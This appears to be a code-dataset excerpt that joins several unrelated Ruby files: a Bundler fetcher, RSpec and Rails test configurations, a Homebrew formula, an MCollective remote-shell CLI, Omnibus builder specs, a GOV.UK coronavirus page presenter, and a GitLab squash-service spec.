      Errno::EINVAL, Errno::ECONNRESET, Errno::ETIMEDOUT, Errno::EAGAIN,
      Net::HTTPBadResponse, Net::HTTPHeaderSyntaxError, Net::ProtocolError
    ]
    HTTP_ERRORS << Net::HTTP::Persistent::Error if defined?(Net::HTTP::Persistent)

    # Fetch +uri+, following up to @redirect_limit redirects; returns the body.
    def fetch(uri, counter = 0)
      raise HTTPError, "Too many redirects" if counter >= @redirect_limit

      begin
        Bundler.ui.debug "Fetching from: #{uri}"
        req = Net::HTTP::Get.new uri.request_uri
        req.basic_auth(uri.user, uri.password) if uri.user && uri.password
        if defined?(Net::HTTP::Persistent)
          response = @connection.request(uri, req)
        else
          response = @connection.request(req)
        end
      rescue OpenSSL::SSL::SSLError
        raise CertificateFailureError.new(@public_uri)
      rescue *HTTP_ERRORS
        raise HTTPError, "Network error while fetching #{uri}"
      end

      case response
      when Net::HTTPRedirection
        Bundler.ui.debug("HTTP Redirection")
        new_uri = URI.parse(response["location"])
        if new_uri.host == uri.host
          # carry credentials over only for same-host redirects
          new_uri.user = uri.user
          new_uri.password = uri.password
        end
        fetch(new_uri, counter + 1)
      when Net::HTTPSuccess
        Bundler.ui.debug("HTTP Success")
        response.body
      when Net::HTTPRequestEntityTooLarge
        raise FallbackError, response.body
      else
        raise HTTPError, "#{response.class}: #{response.body}"
      end
    end

    def dependency_api_uri(gem_names = [])
      url = "#{@remote_uri}api/v1/dependencies"
      url << "?gems=#{URI.encode(gem_names.join(","))}" if gem_names.any?
      URI.parse(url)
    end

    # fetch from Gemcutter Dependency Endpoint API
    def fetch_dependency_remote_specs(gem_names)
      Bundler.ui.debug "Query Gemcutter Dependency Endpoint API: #{gem_names.join(',')}"
      marshalled_deps = fetch dependency_api_uri(gem_names)
      gem_list = Bundler.load_marshal(marshalled_deps)
      deps_list = []

      spec_list = gem_list.map do |s|
        dependencies = s[:dependencies].map do |name, requirement|
          dep = well_formed_dependency(name, requirement.split(", "))
          deps_list << dep.name
          dep
        end

        [s[:name], Gem::Version.new(s[:number]), s[:platform], dependencies]
      end

      [spec_list, deps_list.uniq]
    end

    # fetch from modern index: specs.4.8.gz
    def fetch_all_remote_specs
      Bundler.rubygems.sources = ["#{@remote_uri}"]
      Bundler.rubygems.fetch_all_remote_specs
    rescue Gem::RemoteFetcher::FetchError, OpenSSL::SSL::SSLError => e
      if e.message.match("certificate verify failed")
        raise CertificateFailureError.new(@public_uri)
      else
        Bundler.ui.trace e
        raise HTTPError, "Could not fetch specs from #{@public_uri}"
      end
    end

    # Builds a Gem::Dependency, translating the Syck::DefaultKey YAML bug
    # into a friendly GemspecError.
    def well_formed_dependency(name, *requirements)
      Gem::Dependency.new(name, *requirements)
    rescue ArgumentError => e
      illformed = 'Ill-formed requirement ["#<YAML::Syck::DefaultKey'
      raise e unless e.message.include?(illformed)
      puts # we shouldn't print the error message on the "fetching info" status line
      # BUG FIX: previously interpolated s[:name]/s[:number], but `s` is not
      # in scope here -- that raised NameError instead of this GemspecError.
      raise GemspecError,
        "Unfortunately, the gem #{name} has an invalid " \
        "gemspec. \nPlease ask the gem author to yank the bad version to fix " \
        "this issue. For more information, see http://bit.ly/syck-defaultkey."
    end

    # Certificate store used for HTTPS verification: either the user-supplied
    # CA bundle (ssl_ca_cert setting) or system defaults plus bundled certs.
    def bundler_cert_store
      store = OpenSSL::X509::Store.new
      if Bundler.settings[:ssl_ca_cert]
        if File.directory? Bundler.settings[:ssl_ca_cert]
          store.add_path Bundler.settings[:ssl_ca_cert]
        else
          store.add_file Bundler.settings[:ssl_ca_cert]
        end
      else
        store.set_default_paths
        certs = File.expand_path("../ssl_certs/*.pem", __FILE__)
        Dir.glob(certs).each { |c| store.add_file c }
      end
      store
    end
  end
end
| 35.13125 | 109 | 0.648372 |
0867653140deb2e2759c9061de5a6a5fb3a77dc0 | 3,245 | # freeze_string_literals: true
# This file was generated by the `rspec --init` command. Conventionally, all
# specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`.
# The generated `.rspec` file contains `--require spec_helper` which will cause
# this file to always be loaded, without a need to explicitly require it in any
# files.
#
# Given that it is always loaded, you are encouraged to keep this file as
# light-weight as possible. Requiring heavyweight dependencies from this file
# will add to the boot time of your test suite on EVERY test run, even for an
# individual file that may not need all of that loaded. Instead, consider making
# a separate helper file that requires the additional dependencies and performs
# the additional setup, and require it from the spec files that actually need
# it.
#
# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
require 'webmock/rspec'
require_relative 'support/mock_server'
# Block all real HTTP traffic during specs (localhost stays open for Rack).
WebMock.disable_net_connect!(allow_localhost: true)
STOREDSAFE_SERVER = 'storedsafe.example.com'.freeze
# Single MockServer instance shared by every :api spec via the closure below.
ms = MockServer.new
RSpec.configure do |config|
  config.before(:each, :type => :api) do
    # Loads a JSON fixture from the mock server's fixtures directory.
    # NOTE(review): JSON.parse(JSON.parse(file).to_json) looks like a
    # redundant round-trip -- a single JSON.parse appears equivalent; verify.
    def response_from_file(file)
      file = File.read("#{MockServer::FIXTURES}/#{file}")
      JSON.parse(JSON.parse(file).to_json)
    end
    base_uri = STOREDSAFE_SERVER
    # Route every request aimed at the StoredSafe host to the Rack mock app.
    stub_request(:any, /#{Regexp.quote(base_uri)}/).to_rack(ms)
  end
  config.expect_with :rspec do |expectations|
    # This option will default to `true` in RSpec 4. It makes the `description`
    # and `failure_message` of custom matchers include text for helper methods
    # defined using `chain`, e.g.:
    #     be_bigger_than(2).and_smaller_than(4).description
    #     # => "be bigger than 2 and smaller than 4"
    # ...rather than:
    #     # => "be bigger than 2"
    expectations.include_chain_clauses_in_custom_matcher_descriptions = true
  end
  # rspec-mocks config goes here. You can use an alternate test double
  # library (such as bogus or mocha) by changing the `mock_with` option here.
  config.mock_with :rspec do |mocks|
    # Prevents you from mocking or stubbing a method that does not exist on
    # a real object. This is generally recommended, and will default to
    # `true` in RSpec 4.
    mocks.verify_partial_doubles = true
  end
  # This option will default to `:apply_to_host_groups` in RSpec 4 (and will
  # have no way to turn it off -- the option exists only for backwards
  # compatibility in RSpec 3). It causes shared context metadata to be
  # inherited by the metadata hash of host groups and examples, rather than
  # triggering implicit auto-inclusion in groups with matching metadata.
  config.shared_context_metadata_behavior = :apply_to_host_groups
end
# Custom matcher: passes when the object responds to both the reader (`field`)
# and the writer (`field=`), i.e. behaves as if `attr_accessor :field` were
# declared on its class.
RSpec::Matchers.define :have_attr_accessor do |field|
  match do |object_instance|
    object_instance.respond_to?(field) &&
      object_instance.respond_to?("#{field}=")
  end

  failure_message do |object_instance|
    "expected attr_accessor for #{field} on #{object_instance}"
  end

  failure_message_when_negated do |object_instance|
    # The trailing backslash escapes the newline, so this is one string; the
    # continuation line is left unindented to avoid injecting whitespace.
    "expected attr_accessor for #{field} not to be defined on \
#{object_instance}"
  end

  description do
    "have an attr_accessor `#{field}`"
  end
end
| 39.573171 | 80 | 0.738059 |
4a7af6189db62aa2512a428921a3ab7a490eb05a | 1,134 | Rails.application.config.before_configuration do
Raven.configuration.silence_ready = true
end
Rails.application.configure do
  # Test environment: code is loaded once and cached, nothing is eager-loaded.
  config.cache_classes = true
  config.eager_load = false

  # Serve static files with a short public cache so asset requests hit disk.
  config.public_file_server.enabled = true
  config.public_file_server.headers = {
    'Cache-Control' => 'public, max-age=3600'
  }

  # Show full error reports and raise exceptions straight into the spec.
  config.consider_all_requests_local = true
  config.action_controller.perform_caching = false
  config.action_dispatch.show_exceptions = false

  # CSRF protection off so request specs can POST without auth tokens.
  config.action_controller.allow_forgery_protection = false

  config.action_mailer.perform_caching = false
  # :test delivery accumulates mail in ActionMailer::Base.deliveries.
  config.action_mailer.delivery_method = :test

  config.active_support.deprecation = :stderr

  # So we can always expect the same value in tests
  config.action_mailer.default_url_options = { host: 'https://c100.justice.uk' }

  # NB: Because of the way the form builder works, and hence the
  # gov.uk elements formbuilder, exceptions will not be raised for
  # missing translations of model attribute names. The form will
  # get the constantized attribute name itself, in form labels.
  config.action_view.raise_on_missing_translations = true
end
| 31.5 | 80 | 0.779541 |
396a5d3de80faedd877235e56fc7c63099a15e5f | 1,035 | class Luaver < Formula
desc "Manage and switch between versions of Lua, LuaJIT, and Luarocks"
homepage "https://github.com/DhavalKapil/luaver"
url "https://github.com/DhavalKapil/luaver/archive/v1.1.0.tar.gz"
sha256 "441b1b72818889593d15a035807c95321118ac34270da49cf8d5d64f5f2e486d"
license "MIT"
head "https://github.com/DhavalKapil/luaver.git"
bottle :unneeded
depends_on "wget"
def install
bin.install "luaver"
end
def caveats
<<~EOS
Add the following at the end of the correct file yourself:
if which luaver > /dev/null; then . `which luaver`; fi
EOS
end
test do
lua_versions = %w[5.3.3 5.2.4 5.1.5]
lua_versions.each do |v|
ENV.deparallelize { system ". #{bin}/luaver install #{v} < /dev/null" }
system ". #{bin}/luaver use #{v} && lua -v"
end
luajit_versions = %w[2.0.4]
luajit_versions.each do |v|
system ". #{bin}/luaver install-luajit #{v} < /dev/null"
system ". #{bin}/luaver use-luajit #{v} && luajit -v"
end
end
end
| 27.972973 | 77 | 0.655072 |
bf5176fcbf415c37a629f0eb344fc1d5212194de | 5,365 | require 'mcollective/application/shell/watcher'
# CLI application for the MCollective "shell" agent: runs ad-hoc commands on
# remote nodes and manages long-running background jobs
# (run / start / watch / list / kill).
class MCollective::Application::Shell < MCollective::Application
  description 'Run shell commands'
  usage <<-END_OF_USAGE
mco shell [OPTIONS] [FILTERS] <ACTION> [ARGS]
mco shell run [--tail] [COMMAND]
mco shell start [COMMAND]
mco shell watch [HANDLE]
mco shell list
mco shell kill [HANDLE]
  END_OF_USAGE

  option :tail,
    :arguments => [ '--tail' ],
    :description => 'Switch run to tail mode',
    :type => :bool

  # Validates the positional ACTION argument and records it in the
  # configuration hash before the application runs.
  def post_option_parser(configuration)
    if ARGV.size < 1
      raise "Please specify an action"
    end

    valid_actions = ['run', 'start', 'watch', 'list', 'kill' ]
    action = ARGV.shift

    unless valid_actions.include?(action)
      raise 'Action has to be one of ' + valid_actions.join(', ')
    end

    configuration[:command] = action
  end

  # Dispatches to run_command / start_command / watch_command / list_command /
  # kill_command based on the validated action.
  def main
    send("#{configuration[:command]}_command")
  end

  private

  # `mco shell run` -- the remaining ARGV is the command line to execute.
  # With --tail, output is streamed as the command runs.
  def run_command
    command = ARGV.join(' ')

    if configuration[:tail]
      tail(command)
    else
      do_run(command)
    end
  end

  # `mco shell start` -- launches COMMAND in the background on each node and
  # prints the job handle each node returns.
  def start_command
    command = ARGV.join(' ')

    client = rpcclient('shell')
    responses = client.start(:command => command)
    responses.sort_by! { |r| r[:sender] }
    responses.each do |response|
      if response[:statuscode] == 0
        puts "#{response[:sender]}: #{response[:data][:handle]}"
      else
        puts "#{response[:sender]}: ERROR: #{response.inspect}"
      end
    end

    printrpcstats :summarize => true, :caption => "Started command: #{command}"
  end

  # `mco shell list` -- shows job handles per node; with --verbose also each
  # job's command line and status.
  def list_command
    client = rpcclient('shell')
    responses = client.list
    responses.sort_by! { |r| r[:sender] }
    responses.each do |response|
      if response[:statuscode] == 0
        next if response[:data][:jobs].empty?

        puts "#{response[:sender]}:"
        response[:data][:jobs].keys.sort.each do |handle|
          puts "    #{handle}"
          if client.verbose
            puts "        command: #{response[:data][:jobs][handle][:command]}"
            puts "        status: #{response[:data][:jobs][handle][:status]}"
            puts ""
          end
        end
      end
    end

    printrpcstats :summarize => true, :caption => "Command list"
  end

  # `mco shell watch` -- attaches to already-running jobs whose handles were
  # given on the command line and streams their output.
  def watch_command
    handles = ARGV

    client = rpcclient('shell')
    watchers = []
    client.list.each do |response|
      next if response[:statuscode] != 0

      response[:data][:jobs].keys.each do |handle|
        if handles.include?(handle)
          watchers << Watcher.new(response[:sender], handle)
        end
      end
    end

    watch_these(client, watchers)
  end

  # `mco shell kill` -- terminates the job with the given handle on all
  # matching nodes.
  def kill_command
    handle = ARGV.shift

    client = rpcclient('shell')
    client.kill(:handle => handle)

    printrpcstats :summarize => true, :caption => "Command list"
  end

  # Runs COMMAND synchronously on every node, printing stdout/stderr per
  # node. Exits the whole application with status 1 at the first node that
  # reports a non-zero exitcode.
  def do_run(command)
    client = rpcclient('shell')
    responses = client.run(:command => command)
    responses.sort_by! { |r| r[:sender] }
    responses.each do |response|
      if response[:statuscode] == 0
        puts "#{response[:sender]}:"
        puts response[:data][:stdout]
        if response[:data][:stderr].size > 0
          puts "    STDERR:"
          puts response[:data][:stderr]
        end
        if response[:data][:exitcode] != 0
          puts "exitcode: #{response[:data][:exitcode]}"
          exit 1
        end
        puts ""
      else
        puts "#{response[:sender]}: ERROR: #{response.inspect}"
      end
    end

    printrpcstats :summarize => true, :caption => "Ran command: #{command}"
  end

  # Starts COMMAND on all nodes, then follows every started job's output
  # (like `run`, but streaming); a first interrupt requests a clean kill.
  def tail(command)
    client = rpcclient('shell')

    processes = []
    client.start(:command => command).each do |response|
      next unless response[:statuscode] == 0

      processes << Watcher.new(response[:sender], response[:data][:handle])
    end

    watch_these(client, processes, true)
  end

  # Polls each watched job for new stdout/stderr until all jobs stop.
  # With kill_on_interrupt, the first SIGINT asks the agents to kill the
  # jobs and a second SIGINT aborts immediately; otherwise SIGINT just exits.
  # NOTE(review): this is a busy poll loop with no sleep between status
  # rounds -- confirm the status RPC's round-trip provides enough back-off.
  def watch_these(client, processes, kill_on_interrupt = false)
    client.progress = false
    state = :running

    if kill_on_interrupt
      # trap sigint so we can send a kill to the commands we're watching
      trap('SIGINT') do
        puts "Attempting to stop cleanly, interrupt again to kill"
        state = :stopping

        # if we're double-tapped, just quit (may leave a mess)
        trap('SIGINT') do
          puts "OK you meant it; bye"
          exit 1
        end
      end
    else
      # When we get a sigint we should just exit
      trap('SIGINT') do
        puts ""
        exit 1
      end
    end

    while !processes.empty?
      processes.each do |process|
        # Scope each RPC to the single node that owns this job handle.
        client.filter["identity"].clear
        client.identity_filter process.node

        if state == :stopping && kill_on_interrupt
          puts "Sending kill to #{process.node} #{process.handle}"
          client.kill(:handle => process.handle)
        end

        client.status({
          :handle => process.handle,
          :stdout_offset => process.stdout_offset,
          :stderr_offset => process.stderr_offset,
        }).each do |response|
          if response[:statuscode] != 0
            process.flush
            processes.delete(process)
            break
          end

          process.status(response)

          if response[:data][:status] == :stopped
            process.flush
            processes.delete(process)
          end
        end
        # NOTE(review): `processes` is mutated (delete) while being iterated;
        # the enclosing while loop re-scans, so no job is lost, but iterating
        # over a dup would be safer.
      end
    end
  end
end
| 24.953488 | 79 | 0.588071 |
1a0a30bbc97234c018654a296e1da3b7b1b83d55 | 9,649 | require 'spec_helper'
module Omnibus
describe Builder do
let(:software) do
double(Software,
name: 'chefdk',
install_dir: project_dir,
project_dir: project_dir,
)
end
let(:project_dir) { on_windows ? 'C:/opscode/chefdk' : '/opt/chefdk' }
let(:on_windows) { false }
let(:msys_bash) { "C:\\opscode\\chefdk\\embedded\\msys\\1.0\\bin\\bash.exe" }
def run_build_command
subject.send(:build_commands)[0].run(subject)
end
subject { described_class.new(software) }
before do
allow(subject).to receive(:windows?).and_return(on_windows)
allow(subject).to receive(:windows_safe_path) do |*args|
path = File.join(*args)
path.gsub!(File::SEPARATOR, '\\') if on_windows
end
end
describe '#command' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:command)
end
end
describe '#workers' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:workers)
end
end
describe '#ruby' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:ruby)
end
end
describe '#gem' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:gem)
end
end
describe '#bundle' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:bundle)
end
end
describe '#appbundle' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:appbundle)
end
end
describe '#block' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:block)
end
end
describe '#erb' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:erb)
end
end
describe '#mkdir' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:mkdir)
end
end
describe '#touch' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:touch)
end
end
describe '#delete' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:delete)
end
end
describe '#copy' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:copy)
end
end
describe '#move' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:move)
end
end
describe '#link' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:link)
end
end
describe '#sync' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:sync)
end
end
describe '#windows_safe_path' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:windows_safe_path)
end
end
describe '#project_dir' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:project_dir)
end
end
describe '#install_dir' do
it 'is a DSL method' do
expect(subject).to have_exposed_method(:install_dir)
end
end
describe '#make' do
before do
allow(subject).to receive(:command)
end
it 'is a DSL method' do
expect(subject).to have_exposed_method(:make)
end
context 'when :bin is present' do
it 'uses the custom bin' do
expect(subject).to receive(:command)
.with('/path/to/make', in_msys_bash: true)
subject.make(bin: '/path/to/make')
end
end
context 'when gmake is present' do
before do
allow(Omnibus).to receive(:which)
.with('gmake')
.and_return('/bin/gmake')
end
it 'uses gmake and sets MAKE=gmake' do
expect(subject).to receive(:command)
.with('gmake', env: { 'MAKE' => 'gmake' }, in_msys_bash: true)
subject.make
end
end
context 'when gmake is not present' do
before do
allow(Omnibus).to receive(:which)
.and_return(nil)
end
it 'uses make' do
expect(subject).to receive(:command)
.with('make', in_msys_bash: true)
subject.make
end
end
it 'accepts 0 options' do
expect(subject).to receive(:command)
.with('make', in_msys_bash: true)
expect { subject.make }.to_not raise_error
end
it 'accepts an additional command string' do
expect(subject).to receive(:command)
.with('make install', in_msys_bash: true)
expect { subject.make('install') }.to_not raise_error
end
it 'persists given options' do
expect(subject).to receive(:command)
.with('make', timeout: 3600, in_msys_bash: true)
subject.make(timeout: 3600)
end
end
describe '#configure' do
before do
allow(subject).to receive(:command)
end
it 'is a DSL method' do
expect(subject).to have_exposed_method(:configure)
end
context 'on 64-bit windows' do
let(:on_windows) { true }
let(:windows_i386) { false }
before do
allow(subject).to receive(:windows_arch_i386?)
.and_return(windows_i386)
end
it 'invokes appends platform host to the options' do
expect(subject).to receive(:command)
.with("./configure --host=x86_64-w64-mingw32 --prefix=#{project_dir}/embedded", in_msys_bash: true)
subject.configure()
end
end
context 'when :bin is present' do
it 'uses the custom bin' do
expect(subject).to receive(:command)
.with("/path/to/configure --prefix=#{project_dir}/embedded", in_msys_bash: true)
subject.configure(bin: '/path/to/configure')
end
end
context 'when :prefix is present' do
it 'emits non-empty prefix' do
expect(subject).to receive(:command)
.with("./configure --prefix=/some/prefix", in_msys_bash: true)
subject.configure(prefix: '/some/prefix')
end
it 'omits prefix if empty' do
expect(subject).to receive(:command)
.with("./configure", in_msys_bash: true)
subject.configure(prefix: '')
end
end
it 'accepts 0 options' do
expect(subject).to receive(:command)
.with("./configure --prefix=#{project_dir}/embedded", in_msys_bash: true)
expect { subject.configure }.to_not raise_error
end
it 'accepts an additional command string' do
expect(subject).to receive(:command)
.with("./configure --prefix=#{project_dir}/embedded --myopt", in_msys_bash: true)
expect { subject.configure('--myopt') }.to_not raise_error
end
it 'persists given options' do
expect(subject).to receive(:command)
.with("./configure --prefix=#{project_dir}/embedded", timeout: 3600, in_msys_bash: true)
subject.configure(timeout: 3600)
end
end
describe '#patch' do
before do
allow(subject).to receive(:find_file)
.with('config/patches', 'good_patch')
.and_return(
[ ["#{project_dir}/patch_location1/good_patch", "#{project_dir}/patch_location2/good_patch"],
"#{project_dir}/patch_location2/good_patch" ])
end
it 'is a DSL method' do
expect(subject).to have_exposed_method(:patch)
end
it 'invokes patch with patch level 1 unless specified' do
expect { subject.patch(source: 'good_patch') }.to_not raise_error
expect(subject).to receive(:shellout!)
.with("patch -p1 -i #{project_dir}/patch_location2/good_patch", in_msys_bash: true)
run_build_command
end
it 'invokes patch with patch level provided' do
expect { subject.patch(source: 'good_patch', plevel: 0) }.to_not raise_error
expect(subject).to receive(:shellout!)
.with("patch -p0 -i #{project_dir}/patch_location2/good_patch", in_msys_bash: true)
run_build_command
end
it 'invokes patch differently if target is provided' do
expect { subject.patch(source: 'good_patch', target: 'target/path') }.to_not raise_error
expect(subject).to receive(:shellout!)
.with("cat #{project_dir}/patch_location2/good_patch | patch -p1 target/path", in_msys_bash: true)
run_build_command
end
it 'persists other options' do
expect { subject.patch(source: 'good_patch', timeout:3600) }.to_not raise_error
expect(subject).to receive(:shellout!)
.with("patch -p1 -i #{project_dir}/patch_location2/good_patch", timeout: 3600, in_msys_bash: true)
run_build_command
end
end
describe "#shasum" do
let(:build_step) do
Proc.new {
block do
command("true")
end
}
end
let(:tmp_dir) { Dir.mktmpdir }
after { FileUtils.rmdir(tmp_dir) }
let(:software) do
double(Software,
name: 'chefdk',
install_dir: tmp_dir,
project_dir: tmp_dir,
overridden?: false)
end
let(:before_build_shasum) do
b = described_class.new(software)
b.evaluate(&build_step)
b.shasum
end
it "returns the same value when called before or after the build" do
subject.evaluate(&build_step)
subject.build
expect(subject.shasum).to eq(before_build_shasum)
end
end
end
end
| 28.049419 | 111 | 0.597886 |
7a380b11ad8398fed314244d03e5ca95ab03d5fc | 756 | require 'rails_helper'
require 'vcr'
VCR.configure do |configure|
  # Record HTTP cassettes under spec/vcr_cassettes and intercept via WebMock.
  configure.cassette_library_dir = "spec/vcr_cassettes"
  configure.hook_into :webmock

  # Custom matcher: treats the first request's URI as a regex pattern and
  # matches it against the second request's URI.
  configure.register_request_matcher :uri_regex do |request1, request2|
    request1.uri.match(request2.uri)
  end
end
# Spec helper mixin providing canned request-parameter hashes.
module Params
  # Default user attributes; any keys passed in `params` override the
  # defaults (add more helper methods to be used by all tests here).
  def user_params(params = {})
    defaults = {
      password: "hello55",
      email: "[email protected]",
      name: "Jard",
      phone_number: "6195559090",
      country_code: "+1"
    }
    defaults.merge(params)
  end

  # Fixed attributes for building a reservation.
  def reservation_params
    {
      name: "reservation1",
      guest_phone: "6195559090",
      message: "message1",
      property_id: 1,
    }
  end
end
# Make the canned parameter helpers available inside every example.
RSpec.configure do |c|
  c.include Params
end
| 19.894737 | 71 | 0.669312 |
8704bfdb3207b0f991e4b9be4fed20b54b2f60ad | 3,624 | class CoronavirusLandingPagePresenter
COMPONENTS = %w[
header_section
announcements_label
announcements
see_all_announcements_link
risk_level
nhs_banner
sections
sections_heading
additional_country_guidance
topic_section
statistics_section
notifications
page_header
timeline
].freeze
UK_NATIONS = %w[england northern_ireland scotland wales].freeze
attr_reader :selected_nation
def initialize(content_item, selected_nation = nil)
COMPONENTS.each do |component|
define_singleton_method component do
content_item["details"][component]
end
end
@selected_nation = UK_NATIONS.include?(selected_nation) ? selected_nation : "england"
end
def faq_schema(content_item)
{
"@context": "https://schema.org",
"@type": "FAQPage",
"name": content_item["title"],
"description": content_item["description"],
"mainEntity": build_faq_main_entity(content_item),
}
end
def timeline_nations_items
UK_NATIONS.map do |value|
{
value: value,
text: value.titleize,
checked: selected_nation == value,
data_attributes: {
module: "gem-track-click",
track_category: "pageElementInteraction",
track_action: "TimelineNation",
track_label: value.titleize,
},
}
end
end
def timelines_for_nation
UK_NATIONS.map do |nation|
[nation, timeline_for_nation(nation)]
end
end
private
def build_faq_main_entity(content_item)
question_and_answers = []
question_and_answers.push build_announcements_schema(content_item)
question_and_answers.concat build_sections_schema(content_item)
end
def question_and_answer_schema(question, answer)
{
"@type": "Question",
"name": question,
"acceptedAnswer": {
"@type": "Answer",
"text": answer,
},
}
end
def build_announcements_schema(content_item)
announcement_text = ApplicationController.render partial: "coronavirus_landing_page/components/shared/announcements",
locals: {
announcements: content_item["details"]["announcements"],
}
question_and_answer_schema("Announcements", announcement_text)
end
def build_sections_schema(content_item)
question_and_answers = []
content_item["details"]["sections"].each do |section|
question = section["title"]
answers_text = ApplicationController.render partial: "coronavirus_landing_page/components/shared/section", locals: { section: section }
question_and_answers.push question_and_answer_schema(question, answers_text)
end
question_and_answers
end
def timeline_for_nation(nation)
entries = timeline["list"].select { |item| item["national_applicability"].include?(nation) }
entries.map do |entry|
entry.merge!("tags" => timeline_nation_tags(entry["national_applicability"]))
end
end
def timeline_nation_tags(national_applicability)
if uk_wide?(national_applicability)
"<strong class='govuk-tag govuk-tag--blue covid-timeline__tag'>UK Wide</strong>".html_safe
else
nation_tags = national_applicability.map do |nation|
"<strong class='govuk-tag govuk-tag--blue covid-timeline__tag'>#{nation.titleize}</strong>"
end
nation_tags.join(" ").html_safe
end
end
def uk_wide?(national_applicability)
UK_NATIONS.sort == national_applicability.uniq.sort
end
end
| 28.761905 | 141 | 0.673013 |
e977bbce99ecde44786a1a8385e730add25637e6 | 1,528 | require 'active_support/rails'
require 'abstract_controller'
require 'action_dispatch'
require 'action_controller/metal/live'
require 'action_controller/metal/strong_parameters'
module ActionController
  extend ActiveSupport::Autoload

  autoload :Base
  autoload :Caching
  autoload :Metal
  autoload :Middleware

  # The mixins that compose ActionController::Base, lazily loaded from
  # action_controller/metal/*.
  autoload_under "metal" do
    autoload :Compatibility
    autoload :ConditionalGet
    autoload :Cookies
    autoload :DataStreaming
    autoload :EtagWithTemplateDigest
    autoload :Flash
    autoload :ForceSSL
    autoload :Head
    autoload :Helpers
    autoload :HttpAuthentication
    autoload :ImplicitRender
    autoload :Instrumentation
    autoload :MimeResponds
    autoload :ParamsWrapper
    autoload :RackDelegation
    autoload :Redirecting
    autoload :Renderers
    autoload :Rendering
    autoload :RequestForgeryProtection
    autoload :Rescue
    autoload :Streaming
    autoload :StrongParameters
    autoload :Testing
    autoload :UrlFor
  end

  autoload :TestCase, 'action_controller/test_case'
  autoload :TemplateAssertions, 'action_controller/test_case'

  # Caching declares its own nested autoloads, so it must be eager-loaded
  # explicitly in addition to this module's constants.
  def self.eager_load!
    super
    ActionController::Caching.eager_load!
  end
end
# Common Active Support usage in Action Controller
require 'active_support/core_ext/module/attribute_accessors'
require 'active_support/core_ext/load_error'
require 'active_support/core_ext/module/attr_internal'
require 'active_support/core_ext/name_error'
require 'active_support/core_ext/uri'
require 'active_support/inflector'
| 26.344828 | 61 | 0.77945 |
387be8471b5e0dc17a547e00fd737b34a9459213 | 8,623 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe MergeRequests::SquashService do
include GitHelpers
let(:service) { described_class.new(project: project, current_user: user, params: { merge_request: merge_request }) }
let(:user) { project.first_owner }
let(:project) { create(:project, :repository) }
let(:repository) { project.repository.raw }
let(:log_error) { "Failed to squash merge request #{merge_request.to_reference(full: true)}:" }
let(:squash_dir_path) do
File.join(Gitlab.config.shared.path, 'tmp/squash', repository.gl_repository, merge_request.id.to_s)
end
let(:merge_request_with_one_commit) do
create(:merge_request,
source_branch: 'feature', source_project: project,
target_branch: 'master', target_project: project)
end
let(:merge_request_with_only_new_files) do
create(:merge_request,
source_branch: 'video', source_project: project,
target_branch: 'master', target_project: project)
end
let(:merge_request_with_large_files) do
create(:merge_request,
source_branch: 'squash-large-files', source_project: project,
target_branch: 'master', target_project: project)
end
shared_examples 'the squash succeeds' do
it 'returns the squashed commit SHA' do
result = service.execute
expect(result).to match(status: :success, squash_sha: a_string_matching(/\h{40}/))
expect(result[:squash_sha]).not_to eq(merge_request.diff_head_sha)
end
it 'cleans up the temporary directory' do
service.execute
expect(File.exist?(squash_dir_path)).to be(false)
end
it 'does not keep the branch push event' do
expect { service.execute }.not_to change { Event.count }
end
context 'when there is a single commit in the merge request' do
before do
expect(merge_request).to receive(:commits_count).at_least(:once).and_return(1)
end
it 'will still perform the squash' do
expect(merge_request.target_project.repository).to receive(:squash).and_return('sha')
service.execute
end
context 'when squash message matches commit message' do
let(:service) { described_class.new(project: project, current_user: user, params: { merge_request: merge_request, squash_commit_message: merge_request.first_commit.safe_message }) }
it 'returns that commit SHA' do
result = service.execute
expect(result).to match(status: :success, squash_sha: merge_request.diff_head_sha)
end
it 'does not perform any git actions' do
expect(repository).not_to receive(:squash)
service.execute
end
end
context 'when squash message matches commit message but without trailing new line' do
let(:service) { described_class.new(project: project, current_user: user, params: { merge_request: merge_request, squash_commit_message: merge_request.first_commit.safe_message.strip }) }
it 'returns that commit SHA' do
result = service.execute
expect(result).to match(status: :success, squash_sha: merge_request.diff_head_sha)
end
it 'does not perform any git actions' do
expect(repository).not_to receive(:squash)
service.execute
end
end
end
context 'the squashed commit' do
let(:squash_sha) { service.execute[:squash_sha] }
let(:squash_commit) { project.repository.commit(squash_sha) }
it 'copies the author info from the merge request' do
expect(squash_commit.author_name).to eq(merge_request.author.name)
expect(squash_commit.author_email).to eq(merge_request.author.email)
end
it 'sets the current user as the committer' do
expect(squash_commit.committer_name).to eq(user.name.chomp('.'))
expect(squash_commit.committer_email).to eq(user.email)
end
it 'has the same diff as the merge request, but a different SHA' do
rugged = rugged_repo(project.repository)
mr_diff = rugged.diff(merge_request.diff_base_sha, merge_request.diff_head_sha)
squash_diff = rugged.diff(merge_request.diff_start_sha, squash_sha)
expect(squash_diff.patch.length).to eq(mr_diff.patch.length)
expect(squash_commit.sha).not_to eq(merge_request.diff_head_sha)
end
it 'has a default squash commit message if no message was provided' do
expect(squash_commit.message.chomp).to eq(merge_request.default_squash_commit_message.chomp)
end
context 'if a message was provided' do
let(:service) { described_class.new(project: project, current_user: user, params: { merge_request: merge_request, squash_commit_message: message }) }
let(:message) { 'My custom message' }
let(:squash_sha) { service.execute[:squash_sha] }
it 'has the same message as the message provided' do
expect(squash_commit.message.chomp).to eq(message)
end
end
end
end
describe '#execute' do
context 'when there is only one commit in the merge request' do
let(:merge_request) { merge_request_with_one_commit }
include_examples 'the squash succeeds'
end
